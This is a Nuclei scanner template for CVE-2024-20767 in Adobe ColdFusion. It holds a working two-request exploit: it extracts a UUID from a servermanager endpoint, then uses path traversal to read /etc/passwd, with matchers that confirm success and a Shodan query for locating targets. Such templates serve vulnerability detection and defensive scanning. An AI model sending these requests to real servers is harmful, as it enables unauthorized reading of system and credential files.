60 lines
2.2 KiB
YAML
60 lines
2.2 KiB
YAML
id: CVE-2024-20767
|
|
|
|
info:
|
|
name: Adobe ColdFusion - Arbitrary File Read
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: high
|
|
description: |
|
|
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
|
|
reference:
|
|
- https://jeva.cc/2973.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-20767
|
|
- https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
|
|
- https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
|
|
- https://github.com/Hatcat123/my_stars
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
|
|
cvss-score: 8.2
|
|
cve-id: CVE-2024-20767
|
|
cwe-id: CWE-284
|
|
epss-score: 0.08221
|
|
epss-percentile: 0.94345
|
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: http.component:"Adobe ColdFusion"
|
|
product: coldfusion
|
|
vendor: adobe
|
|
tags: cve,cve2024,adobe,coldfusion,lfr
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
uuid: {{extracted_uuid}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body_1, 'wddxPacket')"
|
|
- "contains(header_2, 'application/json')"
|
|
- "contains(body_2, '/bin/bash')"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body_1
|
|
name: extracted_uuid
|
|
group: 1
|
|
regex:
|
|
- "<var name='uuid'><string>(.*)</string>"
|
|
internal: true
|
|
# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950
|